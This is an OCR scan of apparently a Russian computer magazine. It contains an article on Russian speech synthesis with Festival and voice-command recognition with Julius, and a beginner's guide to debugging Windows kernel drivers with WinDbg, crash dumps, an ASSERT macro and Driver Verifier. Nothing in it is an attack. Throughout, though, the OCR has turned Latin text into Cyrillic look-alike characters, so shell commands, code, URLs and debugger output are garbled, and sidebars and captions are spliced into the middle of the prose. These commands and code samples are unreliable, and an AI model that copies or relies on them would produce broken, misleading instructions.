версий] и выполняем команду: 

$ зийо арРіРийе іпзРаіі РезРіѵаІ 
зреейЬ-Рооіз РеРѵох-ги 

Если же пакета ІезЕ/ох-ги нет в комплекте (он 
доступен, начиная с версии 9. 10], то послеза- 
вершения установки іюзбѵаі выполняем коман- 
ду, чтобы получить файлы поддержки русского 
языка (осторожно, файл большой, ~1 70 Мб]: 

$ ей; мдеР ЬРРр : //йоѵтіоай.Ъегііоз . 
йе / Р е з Р 1 апд /шзи_ги_п зД_с Іип і Р з - 
0.5. Раг .Ъг2 

Распаковываем архив в каталог/изг/збаге/ 
іюзбѵаі/ѵоісез/: 

$ ей /изг/зЬаге/РезРіѵаі/ѵоісез/ 

$ зийо гпкйіг гиззіап 
$ зийо Раг -хР ~/тзи_ги_пзД_с1ипіРз- 
0.5. Раг .Ьг2 

В ІІЬипШ и некоторыхдругихдистрибутивах 
Резііѵаі может выдать ошибку «Итих: сапЧ ореп 
/беѵ/бзр» при попытке вывода звука, поэтому 
мы должны настроить программу на исполь- 
зование АЕ5А. Для этого помещаем в файл 
-/йезбѵаігс строки: 

( РагатеРег . зеР ' Аийіо_Сошшапй 
"аріау -с 1 -Р гаѵг -Р зіб -г $ЗК 
$РІЬЕ" ) 



(РагатеРег . зеР 1 Аийіо_МеРРюй 
' Аийіо_Соттапй) 

Еслиты всесделал правильно, то после 
выполнения следующей команды услышишь 
несколько «железно-звучащий», булькающий, 
но вполне понятный голос господина Карлова: 

$ есРю 1 (ѵоісе_тзи_ги_пзП_сіипіРз) 
(ЗауТехР "Привет от пингвина! " ) 

(сдиіР) 1 I РезРіѵаІ 

Текст должен быть в кодировке ІІТР-8, поэтому 
заранее установи л окал ь ги_РЕІ.ЕІТР-8 в своем 
дистрибутиве. Также рекомендую внести прав- 
ки в файл/изг/зЬагеЛезбѵаіДапдиадез.зст, 
чтобы іюзбѵаі научился автоматически находить 
русский язык и позволял произносить текст, 
переданный в качестве аргументов командной 
строки. Открой Іапдиадез.зст и добавь в его 
начало строки: 

# ѵі /изг/зИагеЛезІіѵаІ/Іапдиадез.зст 

(йеРіпе ( 1апдиаде_гиззіап) 

" ( 1апдиаде_гиззіап) 

ЗеР ир Іапдиаде рагатеРегз Рог 
Киззіап. " 

(зеР! таіеі ѵоісе_тзи_ги_пзЬ_ 
сіипірз) 

(таіеі) 

( РагатеРег . зеР 'Ьапдиаде 'гиззіап) 



Перейди к строке «((МіпеЦеІесМапдиаде 
Іапдиаде]» и добавь две строки: 

( (есдиаі? Іапдиаде 'гиззіап) 
(1апдиаде_гиззіап) ) 

Теперь выполни команду: 

$ есію "Привет" | РезРіѵаІ 
--іапдиаде гиззіап --РРз 

Так гораздо проще и удобнее. Собственно, уже 
в таком виде можно придумать тысячу и одно 
применениедля Еезбѵаі, начиная ссоздания 
говорящего будильника и заканчивая систе- 
мой, читающейтебе почту или новости с ИОВа. 
Однако Еезбѵаі гораздо более гибкая програм- 
ма, которая умеетзачитывать большие файлы, 
работать в пакетном режиме и выполнять роль 
ТСР-сервера. Например, используя пакетный 



режим, ты можешь запустить процесс чтения 
файла: 

$ РезРіѵаІ --іапдиаде гиззіап --РРз 
Рііе . РхР 

При запуске в режиме сервера іезііѵа I откры- 
вает порт 131 4 для чтения команд. Используя 
эту особенность, ты можешь создать клиент- 
серверное ПО для выполнения синтеза речи. 
Запусти іезііѵаі в серверном режиме: 

$ РезРіѵаІ --зегѵег & 

Вызови іеІпеЕ 

$ РеіпеР ІосаііюзР 1314 

И запиши команды. Например, если хочешь, 
чтобы іезііѵаі произнесуказанную тобой фразу 
на русском языке, запиши: 

( ѵоісе_тзи_ги_пзП_с1ипіРз ) 

(ЗауТехР "Привет! " ) 

Если же он должен прочитать файл, то команды 
будут такими: 

( ѵоісе_тзи_ги_пзП_сіипіРз ) 

(РРз_Рііе "Привет") 

Для завершения работы іеэііѵаі набери «(диЕ]». 
Чтобы каждый раз не выбирать русский язык 
самостоятельно, добавь в файл /изг/збаге/ 
ІезбѵаІ/іпіЕзспп строки: 

; ; ; БеРаиіР ѵоіее (Паѵе Ро Йо 
зотеРМпд сиРе зо аиРоіоайз зРііі 
ѵгогк) 

(еѵаі (ІізР ѵоісе_тзи_ги_пзк_ 
сіипірз) ) 

ПИНГВИН! ЛЕЖАТЬ! 

Перед тем, как перейти кустановке и настройке 
системы распознавания речи, давай всежеоп- 
ределимся стем, чего мы хотим добиться. Дело 
в том, что ни один из открытых движков, будь 
тоЗрЫпх, Йи1іи5 или какой-то менее известный 
проект, не способен на 1 00% верно разобрать 
речь, даже если она будет при надлежать актеру 
с хорошо поставленным голосом. Однако при 
правильной тренировке программы (которая 
также включает в себя и подгонку под особен- 
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ІШІХОЮ 



іаіі тагдіп = 40 Ѳ твес* 

Іопд-'Ьегга ОС гетоѵаі - о 11 
ге]ес1: зМогІ: іприі = оІТ 

Бузіет Іпіогтаііоп епй -- — 

*********************************************** ************** 

* М0ТІСЕ: ТИе іігзі іприі: тау поі Ье гесодпігесі, зіпее * 

* по іпіііаі СММ рагатеіег із аѵаіІаЬІе оп зіагіир. * 

* іог МРСС01* 



5ТАТ : АО-іп іЬгеасІ сгеаіесі 
ра55І_Ье5І:: < б > 00 5ІЕЕИСЕ 
зепіепсеі: <5> 00 РРЧЕѴ </з> 
ра55І_Ьезі: <5> СОМР 
зепіепсеі: <б> 00 Р1_АѴ </ б > 
раз5І_Ье5І:: <в> 00 БІ(_ЕМСЕ 
зепіепсеі: <в> 00 5ХСЕМСЕ </з> 
ра55І_Ьев1:: <в> 00 МЕХТ 
зепіепсеі: <з> 00 МЕХТ </%> 

<« ріеаве вреак >»| 

На первом проходе ^ и И из дает сбои.нона втором не ошибается 



ПОМОГИ В СОЗДАНИИ РУССКОЙ ЯЗЫКОВОЙ МОДЕЛИ 



Помоги общему делу в создании языковой модели русского языка для іиііиз и ЗрЬіпх. 
Зайди на стран ичкѵ ѵѵѵѵѵѵ.ѵохіюгде.огд/ги и в режиме «онлайн» запиши начитанный тобой 
текст. Проекту нужно всего 140 часов речи для создания качественной языковой модели, 
однако пока общий объем не достигаети 10 часов. 



Ф © НЖ 1*л1-4«-Н>14Ч[Н| 
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КТТ5 быстро нашел русский голос 
для Резііѵаі 



Просмотрев файл затріе.ѵоса, ты можешь 
заметить, что он содержит совсем небольшой 
списокслов, таких каксаіі, дер біаіит.д., атакже 
их фонетическое представление (что-то вроде 
транскрипции], файл затріе.дгаттагсодержит 
правила, в каких комбинацияхэти слова могут 
быть использованы. Не беспокойся, если он тебе 
непонятен, это нормально. 

Попробуем изменить файлы так, чтобы подог- 
нать их под нашу задачу, которой будет... допус- 
тим, управление аудиоплеером. Итак, открой 
файл затріе.ѵоса и добавь в него следующее 
(удалив прежнее содержимое): 



ности произношения конкретного человека] ее 
вполне можно научить корректно распознавать 
простые двух-словные команды почти в 100% 
случаев. И вотздесь насждеточень неприятный 
сюрприз: наиболее известная и распространен- 
ная СМИ ЗрЫпх (которая, кстати, имеет целых 
четыре параллельно развиваемых версии, одна 
из них написана на Оаѵа] до сих пор находит- 
ся в стадии «вечной альфы», пользоваться 
которой (не говоря уже отренировке] обычному 
пользователю довольно затруднительно. Су- 
ществует, конечно, утилита Споте Ѵоісе Сопігоі, 
существенно упрощающая процесс общения с 
программой, но работает она только в Споте. 
Поэтому мы воспользуемся Диііиз, который хоть 
и имеет некоторые проблемы, нооченьпроств 
использовании. Зи Іі из есть в репозиториях мно- 
гихдистрибутивов, и его не придется собирать 
из исходников. В ІІЬипІи для установки Диііиз 
достаточно выполнить команду: 

$ зисіо арСіСисІе іпзкаіі зиііиз 

Чтобы научить Чиііиз пониматьанглийский язык, 
тебе понадобятся файлы акустической модели, 
содержащие статистическое представление 
звуков, которые может воспринимать движок. 
Акустическая модель строится п^ем обработки 
звуковых файлов (с начитанными человеком 
фрагментами текстов] специальными програм- 
мами (например, из пакета НТК). Наиболее 
правильно самому наговорить эти фрагменты и, 
таким образом, научить движок распознавать 
именнотвой голос (втом числе, интонацию 
и ошибки произношения] и словосочетания, 
которые нужны именнотебе. Тогда процент 



правильного распознавания будет стремиться 
кзначению 100. Однако все это сложно, требует 
определенной подготовки и времени, поэтому 
пока мы ограничимся акустической моделью, 
распространяемой с сайта уѵуууѵ.ѵохіогде.огд . 
Для этого надо установить па кет] и Ііиз-ѵохіогде: 

$ зисіо арБікисІе іпзСаІІ ^иііиз- 
ѵохТогде 

Теперь приступаем кнастройке, она включает 
в себя только создание словаря: списка слов, 
которые распознаетдвижок, и объяснениетого, 
какслова могут между собой сопоставляться. 
Нужно это для двух целей: во-первых, движок 
должен знать произношение слов и понимать их, 
а во-вторых, сократив словарь всегодо несколь- 
кихфраз, мы повысим качество распознавания. 
Возьмем стандартные словари, распространяе- 
мые вместе с пакетом щііиз-ѵохіюгде: 

$ шксііг ~/ зиііиз-дгашшаг 
$ ср /изг/зЬаге/сІос/зиІіиз-ѵохТогде/ 
ехашріез/* ~/ зиііиз-дгашгпаг 
$ ссі -/зиііиз-дгашшаг 
$ дипгір * 2>&1 | дгер -ѵ ідпогесі 



$ѵі затріе.ѵоса 

% ыз_в 

<з> зіі 

% БЗ_Е 
</з> зіі 

% ІБ 

БО СІ йот 

% СОММАББ 

РБАУ р 1 еу 

БЕХТ п еЪ. к з Б 

РЕЕѴ р г іу ѵ 

ЗІБЕБСЕ з ау 1 ах п з 

В файл затріе.дгаттагпомести строку: 

3 : ЫЗ_В ІБ СОММАББ БЗ_Е 

Все это значит, что движок должен понимать 
словосочетания, которые состоят из: тишина 
(Ы5_В), слов«бо» (Ю), «ріау», «пехі», «ргеѵ» или 
«зііепсе» (СОММАШ), тишина (Ы5_Е). Говоря 
проще, ты можешь сказать «Оо ріау», и комп 
тебя поймет, вто время какслова «Неііо ѴѴогІсІ» 
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Симпатичная оболочка для ^(.іиз 



будут для него инопланетным языком. Хорошая особенность 
короткого словаря втом, что, даже если ты скажешь что-то 
вроде «Эи ргау», движок, скорее всего, распознает это как 
«Эо ріау», а не как-нибудь иначе (в английском десятки и 
сотни словзвучаточень похоже]. 

Теперь, не выходя из каталога, выполни команду для генера- 
ции файлов затрІе.сЕа затрІеТегт и затрІе.сІісЕ 

$ тксііа затріе 

Это все. Можешь протестироватьщііиз с помощью команды: 

$ зиііиз -іприС тіс -С з'иііапосоп^ 

После появления строки «<<< ріеазе зреак >>>» начинай 
говорить определенные выше фразы. Чтобы движок пра- 
вильно их понял, говори слитно, какэто делаютанглогово- 
рящие (голоса которых и были использованы для создания 
акустической модели ѵохію где], без перерыва между словами. 
То есть, говори «Дуплэй», а не «Ду плэй», словно на занятиях 
английского для большей разборчивости. При таком способе 
произношения движок работает на удивлен нехорошо, лично 
у меня ни одного сбоя на 10 фраз. Если ты получаешь худшие 
результаты, хорошенько поработай над своим произношени- 
ем и купи добротный микрофон. 

Конечно, пока от программы малотолку, поэтому мы должны 
создать Оіаіод тападегдо есть, программу (скрипт], которая 
будет отвечать за перевод отдаваемыхтобой голосовых 
команд в команды на исполнение. Ксчастью, сделать это 
просто, достаточно прицепить на выход ^ и И из стандартный 
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Ты можешь самостоятельно сравнить качество распоз- 
навания ЗрЫпх (второй, самой быстрой версии) и Э и Ііиз, 
просто установив пакетзрЫпх2-Ьіп: 

$ зисіо арСіСисІе іпзСаІІ зрМпх2-Ьіп 

И запустив демонстрационную программу распознава- 
ния с малым словарем: 

$ зрМпх2 -сіето 



В моем случае ЗрЫпх показал просто провальные ре- 
зультаты, не идущие ни в какое сравнение с Э и И из. 



ЕХІТ 

апсі 50 іп тайе іпіо а ігідгат Іапдиаде тосіеі. 

5ау ■ЕЫІпдз НКе "до Тогиагсі іеп гпеІегБ" 

ог “гоіаіе гідМ: 45 гіедгеез" 

5ау ЕХІТ ог диіт То диі*. 

ЕхесиТіпд /и5г/Ьіп/5рП1пха-сопТіпиои5, , , (аее зрПіпх2-5ітр1е Тог ехат 
ріе) 

5ее зрІпіпх2-5ІтрІе Тог ехатріе агдитепТз, ог есІІТ ТТііз зсгірТ. 

[іпіііаіігіпд] 

[зііепсе] [аисііо] 

[зііепсе] [аисііо] 00 
[зііепсе] [аисііо] ОМЕ 
[зііепсе] [аисііо] 

[зііепсе] [аисііо] ЕІОНТ 
[зііепсе] [аисііо] Р01Ж 
[зііепсе] [аисііо] ОМЕ 
[зііепсе] [аисііо] ТНЕ 
[зііепсе] | 

Из восьми сказанных ело в ЗрЫпх по ня л только два 



ввод скрипта, который будет обрабатывать печатаемые ЭиІіи5 
фразы. Например, скриптдляуправления аибасіоиз на языке 
руЫоп может вы глядеть та к: 

$ѵі соттапсі.ру 

сіеі рагзе(ііпе) : 

рагатз = [рагат. Ісжег ( ) Тог рагат іп Ііпе. 
зрІіТ ( ) ІТ рагат] 
соттапсіз = { 

'ріау' : 'аис!асіоиз2 -р 1 , 

'зііепсе': 'аис!асіоиз2 -и', 

’пехТ': 'аис!асіоиз2 -Т', 

’ргеѵ' : 'ашіасіоиз2 -г' , 

} 

ІТ рагатз [1] іп соттапсіз : 

оз . рореп ( соттапсіз [рагатз [ 1 ] ] ) 

Сохрани его под именем соттапсі.ру и запускай щііиз следу- 
ющим образом: 

$ зиііиз -<диіеТ -іприТ тіс -С :іи1іап . з сопТ 2> 
/сіеѵ/пиіі I ./соттапсі.ру 

На прилагаемом кжурналу дискеты найдешьсписокфо- 
нетических представлений многиханглийскихслов (Ьеер. 
Іаг.дг], — их можно использовать для формирования своего 
собственного словаря. Документы іиіогіаі и Тюѵѵ-Іо на сайте 
уууууу.уохЬгде.огд описывают процесс создания собственной 
акустической модели, которую ты сможешь использовать для 
достижения более высокого качества распознавания (через 
обучение движка особенностям твоего произношения]. 

Не используй большой словарь и не пытайся создать мега-бота 
с искусственным интеллектом, который будет понимать целые 
предложения и отвечать на н их с использованием [езбѵаі. Пом- 
ни: чем меньше словарь, тем выше качество распознавания. 

ЗАНАВЕС 

Открытые системы синтеза и распознавания речи, которые 
можно использовать в Ыпих, хВЗО, Зоіагіз и других системах, 
не стоят на месте и продолжают развиваться. Еще совсем 
недавно мы не имели поддержки русского в [езбѵаі и не гово- 
рили всерьез о распознавании голосовых команд, а сегодня, 
какты сам смогубедиться, все это есть и вполне корректно 
работает. Не без изъянов и подводных камней, со множест- 
вом ошибок, но работает, □с 




| НТТР://ѴѴѴѴѴѴ| 

I Г 

> Ипкз 

• ѵѵѵѵѵѵ.ѵохІЪгде.огд 
— архив открытых 
языковых моделей. 
• ѵууууу.сзЫ.есІ.ас.ик/ 
ргоіесІзЛезбѵаІ — 
ЕезЛѵаЕ 

• ЫірУ/ассеззіЬіЫу. 
ксіе.огд/сіеѵеіорег/ 
кЛзс! — КТТ50: обер- 
тка для ЕезЛѵаІ. 
• ЫірУ/стизрЫпх. 
зоигсеЬгде.пеіУЫтІ/ 
стизрЫпх.рбр — 
ЗрЫпх. 

• уууууу.зреесЬ.сз.сти. 
есІи/роскеІзрЫпх — 
РоскеіЗрЫпх. 

• ЫірУ/Ііѵе. 
дпоте.огд/ 
ЭпотеѴоісеСопігоІ — 
Опоте Ѵоісе СоЫгоЕ 
обертка для ЗрЫпх II. 
• ЫірУ/регІЬох.огд — 
РегІВох: обертка для 
ЗрЫпх II. 

• ЫірУ/Ык.епд.сат. 
ас.ик — НТК. 
•ЫДрТ/щИиз^ 
зоигсеЫгдедр/еп 
іпсІех.рЬ — Э и Іі из. 
• ЫЧрУ/зітоп-ІізІепз. 
рщ — Зітот обертка 
для Э и Іі из. 
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ССЮІЫО 

АЛЕКСАНДР ЭККЕРТ АІ_ЕК 5 АМ 0 Р-ЕНККЕВТгаКАМВІ_ЕК.Ки 



^■■■9 
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ЗМИЕМ 

КРАТКИЙ МАНУАЛ 

ПО ПРОФИЛАКТИКЕ ВЗОй 

ДЛЯ НАЧИНАЮЩЕГО 
ДРАЙВЕРОПИСАТЕЛЯ 

ПО СТАТИСТИКЕ, 90% ВРЕМЕНИ, КОТОРОЕ ПРОГРАММИСТ ТРАТИТ НА РАЗ- 
РАБОТКУ ПРОГРАММЫ. СОСТАВЛЯЮТ ЕЕ ДЕБАГ И ОТЛАДКА. И ВПРАВДУ. 
ВЕДЬ НАКИДАТЬ КОД НЕСЛОЖНО - СЛОЖНО ЗАСТАВИТЬ ЕГО РАБОТАТЬ :). 
ВДВОЙНЕ ТЯЖЕЛО. ЕСЛИ РЕЧЬ ИДЕТ ОБ ОТЛАДКЕ КОДА. КОТОРЫЙ ДОЛ- 
ЖЕН ИСПОЛНЯТЬСЯ В ЯДРЕ ѴѴІЫ00ѴѴ5. ПОГОВОРИМ О ТОМ, КАКОБЛЕГЧИТЬ 
ЖИЗНЬ НАЧИНАЮЩЕМУДРАЙВЕРОПИСАТЕЛЮ И ПРЕОДОЛЕТЬ ТРУДНОСТИ 
ПРИ ОТЛАДКЕ И ДЕБАГЕ КОДА ЯДРА. 



і Л 



^■■■9 
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О тладка юзермодных программ, написанных на языках 

высокого уровня, не представляет особого затруднения для 
человека разумного. Существующие сегодня среды разра- 
ботки значительно упрощают программисту жизнь — теперь 
отладка программного кода и выискивание ошибокстало 
делом вполне обычным и легко решаемым. А отладка исключений, 
скажем, в Ѵізиаі Зіисііо, вообще потрясает воображение. Правда, 
дебаггером еще надо научиться пользоваться, но это уже совсем 
другой вопрос. 

Отладка — часто тяжелая и утомительная задача. Способности 
кодера котладке — по-видимому, важнейший фактор в обнаружении 
источника проблемы, но сложность отладки сильно зависит от ис- 
пользуемого языка программирования и инструментов, в частности, 
отладчиков. 

Но и эта сложность может стать неподъемной, когда речь идет об 
отладке драйверов уровня ядра. Причина одна — если падение 
юзермодной программы приводитлишь кзавершению работы самой 
программы, то за падением драйвера, как правило, следует В5СЮ. 
Помню, едва мне пришлось столкнуться с разработкой драйверов, 
ВЗСЮ’ы стали неотъемлемой частью моей кодерской жизни и к ним 
было очень тяжело привыкнуть. Но еще тяжелее было понять при- 
чину, вызвавшую падение драйвера — ведь даже когда я научился 
загружать крэшдамп в ѴѴіпОВО, коды багчека на первых порах мне 
мало что говорили. Со временем кусочки разрозненной инфор- 
мации стали складываться в более-менее узнаваемую разумом 
мозаику и отладка стала для меня сродни детективному расследо- 
ванию. 

ВШЕ 5СРЕЕМ ОР РЕАТН 

Так радующий линуксоидов Віие Эсгееп 01 БеаіФ (В5СЮ) пред- 
ставляет собой всего лишь результат выполнения функции ядра 
КеВидСЬескЕх. Функция показывает пользователю, что ядро систе- 
мы зарегистрировало внештатную ситуацию, которую она не в силах 
обработать. 

При всем многообразии причин, ведущих к В50Б, для его отображе- 
ния (и дополнительных действий, описание которых здесь опустим) 
в ядре разработан специальный механизм, который необходимо 
вызвать. Банальность ответа о причине В50 0 заключается в том, что 
В50Б «наступает» всякий раз, кактолько вызывается функция ядра 
КеВидСЬескЕх, и, независимо от источника и кода ошибки, именно 
эта функция и вызывается драйверами режима ядра. При этом В5СЮ, 
вызванный ІІзегМосГными процессами — редкость, однако, если 
постараться, то, помурыжив функцию ШРаізеНагсІЕггогП, можно 
сгенерировать «синий экран» и из пользовательского режима. 

При вызове КеВидСЬескЕх ОС ѴѴіпсІоѵѵз создает и сбрасывает на диск 
(обычно в папку %5узІетРооІ%\МіпісІиппр) крэшдамп, созданный 
при аварийном выходе. Этот крэшдамп содержит в себе необходимую 
минимальную информацию, которая нужна, чтобы понять причину 
ошибки, вызвавшей В50Б. Обычно ее хватает. 

Стандартный минидамп, который система создает по умолчанию, 
«весит» 64 КЬ. При этом существует возможность заставить систему 
сбрасывать на диск «Дамп памяти ядра» и «Полный дамп памяти». В 
последнем случае на диск будет сброшено все содержимое физи- 
ческой памяти, занятое под юзермодные программы и компоненты 
ядра. Что именно выбирать — зависит от конкретных задач, иногда 
стандартного минидампа вполне хватает, чтобы выявить причины 
падения. 

ВООРУЖАЕМСЯ ПО ПОЛНОЙ ПРОГРАММЕ 

ѴѴіпОВС, продукт малоизвестной компании Місгозоіі — мощное 
оружие, предназначенное для отладки любого, как юзермодного, так 
и ядер но го кода, а также анализа аварийных дампов. Последнюю 
версию ѴѴіпОВО можно скачать здесь — ЬирѴ/тзсІЕппісгозоіІ.сот/ 
сіоѵѵпіоаб . Ценность ѴѴіпБВО в нашем случае проявляется именно 
в анализе крэшдампов. Об этой особенности ѴѴіпБВОмысейчаси 
поговорим. 




ЗНАКОМАЯ КАРТИНА, НЕ ПРАВДА ЛИ? 



лі*1 




Для модалнич рдбомя диспетчера, наймите кнопад Т етом" Для юменетиа параметр» диспетчера налмтте 
киоску 'Назад'' 




ДИСПЕТЧЕР ПРОВЕРКИ ДРАЙВЕРОВ 



Для полноценного анализа крэшдампов нужно скачать с сайта 
Місгозоіі пакетт.н. «символов» — набор файлов с расширением рбЬ, 
в которых содержится структурное описание системных функций, 
списков и констант [ ЬирЦ/тзсіІ.ппісгогоГЕсопп/сІоѵѵпІоасІ/зѵтЬоІз ]. 
Символы жизненно необходимы при отладке (почему? смотри кар- 
тинку!). 

На рисунке можно увидеть, что наличие символов делает отладку 
более читаемой. ѴѴіпОВС, помимо отладки юзермодного кода, может 
также использоваться и в качестве ядерного отладчика реального 
времени (типа БоГИсе или Эузег). Как это сделать — ты легко можешь 
найти в Сети, скажутолько, что нужно будет поднять виртуальную 
машину и по шаманить с настройками ѴѴіпОВС. После можно начать 
отладку драйверов. 

Итак, какбы намни хотелось, системный разработчик драйверов 
уровня ядра ВЗСЮ’ы будет видеть всегда. Однако, приложив не- 
большие усилия, на стадии кодинга и дебага можно свести число их 
появления к минимуму. Для этого оказалось достаточным в процессе 
кодинга соблюдать следующие три условия: 

1 ) использовать блоки Ігу{} — ехсерШ; 

2) использовать при необходимости макрос А55ЕРТ ; 

3) пользоваться йгіѵег Ѵегібег. 

Работа с исключениями в драйверах ничем не отличается от юзер мо- 
да, поэтому я смело использую блоки Егу{} ехсерШ в своем коде. 

Бывают, конечно, случаи, когда простой 5ЕН-фрейм не сработает 
(например, исключения, генерируемые всякими функциями вроде 
МтРгоЬеЕогРеасІ обрабатываются только С-шным5ЕН -фреймом с 
его специфичными структурами). Есть множество типов исключе- 
ний, которые вообще не обрабатываются 5ЕН-фреймами, например, 
деление на 0, двойное исключение, исключения при обращении к 
неподкачиваемой памяти и т.д. Но это тебе для сведения, поскольку 
обычные 5ЕН -фреймы часто выручают при обработке исключений. 
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> іпіо 

Советую к обяза- 
тельному прочте- 
нию «Приложение 
«А» к книге Криса 
Касперски «Записки 
исследователя ком- 
пьютерных вирусов» 
под говорящим 
названием «Прак- 
тические советы 
по восстановлению 
системы в боевых 
условиях». 



> СІѴСІ 

На дискеты найдешь 
литературу, которая 
поможеттебе в от- 
ладке и дебаге твоего 
кода. 

ь 



РІ 02 ПА РО ПС 

е Л >00010202 

«сіі.д-ога р«г [«ах*10»0 а*:«ЙЗ:77772СМА .???????? 



НТТР://ѴШѴѴ 
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> Ііпкз 

ЬіірУАл/ѵѵѵѵ.гзсІп.ги/ 
Ьгит/азт — лучший 
форум для твоего 
времяпрепровож- 
дения. 



ПАДЕНИЕ ЮІ -ФИЛЬТРА Е5ЕТ 5МАРТ 
5ЕСІІРІТѴ — ЕРРѴѴЮІ.5Ѵ5 



МАКРОС А55ЕРТ 

Чтобы быть во всеоружии, позволь дать совет — очень 
полезно в коде драйвера проверять выполнение не- 
которых условий через макрос А55ЕНТ. Также исполь- 
зование этого макроса — просто хороший тон в кодинге. 
Итак, этот макрос выполняется тогда, когда логическое 
выражение, которое он «охраняет», является ложным. 
Т.е. А55ЕНТ(2+2 == 4) прервет выполнение программы в 
том случае, когда 2 + 2 не будет равным четырем. Мы пой- 
дем еще дальше — попробуем сообразить свой макрос 
А55ЕНТ, который поможет нам в отладке кода. 

Пишем свой макрос А55ЕПТ 

#сіеТіпе МУ_ВШСНЕСК_СОВЕ ОхсіеасІЪеаі 

іпііпе ѵоісі _шуВидСЬ.еск ( сЬ.аг * Еііе, іпС 

Ьіпе) 

{ 

КсІРгіпк ( («А-А-А-А! Неір ! Неір ! ЕхесиСіоп 
іаііесі іп іііе %з аС Ііпе %с1\п», Еііе, Ьіпе) ) ; 
КеВидСкескЕх (МУ_ВІЮСНЕСК_СОБЕ , Ііпе, 0,0, 

0) ; 

} 

Меііпе МуВидСЬеск ( ) _туВидСкеск ( ЕІЬЕ , 

ЬШЕ ) 

# сіе ііпе МуАззегіАІмауз (х) іі ( ! (х) ) { 
МуВидСкеск ( ) ; } 

#іі БВС 

#с!еііпе МуАззегі (х) МуАззегРАІмауз (х) 

#е1зе 

#3еіі г.е МуАззегі (х) 

#епсііі 

РРІѴЕР ѴЕРІРІЕР 

В стандартный состав ѴѴіпбоѵѵз 00К входитзамечатель- 
ная тулза, которую очень часто игнорируют начинающие 
разработчики драйверов уровня ядра — Огіѵег Ѵегібег. 
Она специально предназначена для того, чтобы вы- 
являть ошибки, возможно, допущенные в драйвере. Если 
таковые будут обнаружены — йгіѵег ѴегіЕег сгенерирует 
В5СЮ, в котором будут подробно показаны причины его 
возникновения. Огіѵег ѴегіЕег поможеттебе выявить 
самые часто встречающиеся ошибки, возникающие 
при использовании памяти, обнаружении взаимобло- 
кировок, слежении за уровнем I РОЕ и многое другое. 

Для проведения проверки достаточно выбрать драйвер 
из имеющегося списка или загрузить свой, после чего 
стартовать сам драйвер. 



ВСЕ «СИНИЕ ЭКРАНЫ» ТАКИМИ БЫ 
БЫЛИ... 



КАК ПОКАЗЫВАЕТ ПРАКТИКА... 

Позволю себе в рамках статьи остановиться на двух 
багчеках, которые тебе будут встречаться в процессе 
разработки драйверов уровня ядра чаще всего. Они 
же являются самыми малоинформативными и раздра- 
жающими и без того измученную «Нарзаном» нервную 
систему программиста. 

Первый багчек- это КЕРМЕЕ_МСЮЕ_ЕХСЕРТІОІ\І_ 
М0Т_НАЫ0ЕЕ0. Даже его название ни о чем не говорит, 
намекая на «произошло что-то, что система не смогла 
обработать». Практика показывает, что если система 
чистая (на ней не установлены драйверы анти в и рей, 
файров и проактивок], то этот багчек в 99.99% процен- 
тах случаев прямо указывает на твои, прости за пря- 
моту, кривые руки. Причиной, скорее всего, окажется 
неинициализированная переменная или же нулевой 
указатель. 

Второй багчек - ІВаЕ_І\І0Т_ЕЕ55_0В_ЕСіиАЕ. В ста- 
бильно работающей системе этот багчек практически 
не встречается. Его причина всегда одна — в твоем 
загруженном драйвере была осуществлена попытка об- 
ратиться к странице памяти на уровне 0І5РАТСН_ЕЕѴЕЕ, 
что и привело к падению. 

Несмотря на явно видимые причины возникновения, баг 
часто встречается у начинающих драйверо писателей 
из-за незнания одной вещи — все системные функции 
ядра выполняются на разных I Р О И. Если внимательно 
почитать ОИК, то можно увидеть, что в каждом описании 
системной функции в самом конце имеется объявление, 
которое прямо указывает, на каком уровне I РОЕ выполня- 
ется данная функция. Как устранить этот багчек? Грамот- 
ное решение: использовать ѴѴогкКет’ы — специально 
разработанный механизм, предназначенный именно 
для таких случаев. Он выполняет отложенное програм- 
мистом действие, которое будет выполнено на прием- 
лемом уровне I РОЕ. Кстати, если не ошибаюсь, в .ЫЕТ 
Егатеѵѵогк, начиная со второй версии, также появился 
класс ѴѴогкКет’ов, предназначенных для выполнения 
отложенных операций, хотя принципы этого класса рабо- 
ты в СЕР, конечноже, отличаются от ѴѴі п32 Ыаііѵе. 

Используем ѴѴогкІІет'ы в коде 

іі (КеСеіСиггепіІгдІ ( ) ! = РА331УЕ_ЬЕУЕЬ) 

{ 

зСгисі БеІауесіРагатеІіегз *рагат = 

(зСгисі БеІауесІРагатеіегз *) 



► 088 
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АШШШ 



ашшш 




* * 

К ЕКНВІ_МСШ_ЕНСЕРТ I ОН_НОТ_Н А1ШІЕ 0_М ( 10 О О О 0 8е ) 

ТЫ^ із а ѵегу солтоп ЬялдсЬеск ♦ ТТзиаіІу іЬе ехсерііоп адсігезз ріпроіпіз 
іЬе сігіѵег/іипсііоп іЬаі саизесі іКе ргоЬІет, Аіѵауз поіе іЬіз асісігезз 
аз ’етеіі аз іЬе Ііпк <іаіе о! іЬе вгіѵег/ітаде ікаі сопіаіпз іЬіз асісігезз. 

Зогае солтоп ргоЫеіиз аге ехсерііоп сосіе 0x80000003, ТЬіз зпеапз а Ьагсі 
согіесі Ъгеакроіпі ог аззегііоп теаз Іііі, Ъиі іЪіз зузіет ^аз Ъооіегі 
/1ЮВЕВІГС . ТЬіз із поі зиррозесі іо Ъарреп аз сіеѵвіорегз зЬоиЫ пеѵех Ьаѵз 
Ьагсісосіесі Ъгеакроіпіз іі> геіаіі ссніе, Ъиі 

Іі іЬіз каррепз, таке зиге а сіеЪиддег деіз соппесіесі, аші іЬе 

зузіекі із Ъооіеіі /ВЕВІІС. ТЬіз ^ііі Іеі из зее тсЪу іЬіз Ъгеакроіпі із 

Ьаррепіпд. 

Агдитепіз ; 

Агді: сООООООБ, ТЬе ехсерііоп согіе іЬаі ѵаз поі Ьашііесі 
Агд2 : ЗОБЗЪЕее, Тке асісігезз ікаі іке ехсерііоп оссиггееі аі 
АгдЗ : ааЪ67994, Тгар Егате 
Агд4 : 00000000 

ОеЬиддіпд Веіаііз: 



ЕХСЕРТІОК^СОВЕ : (КТ5ТАТ03) ОхсООООООБ - <0паЫе іо деі еггог сосіе іехі> 
ИЦГГІН6_ІР : 

пі !ДОіКезеіИгііеЪ7аісЬ+74 

ЗОБЗЪБее За07 тоѵ аі , Ьуіе ріг [есіі] 

ТКАР^РШШЕ: ааЬ67994 — і . ігар Окі іі іі ШааЬ67Э94 ) 

ЕггСоде = 00000000 

еах=і8Ъ82928 еЬх=81са6сеО есх-і8Ъ823е4 есіх-0 0006І4 8 езі = 00000000 есіі = 00000000 
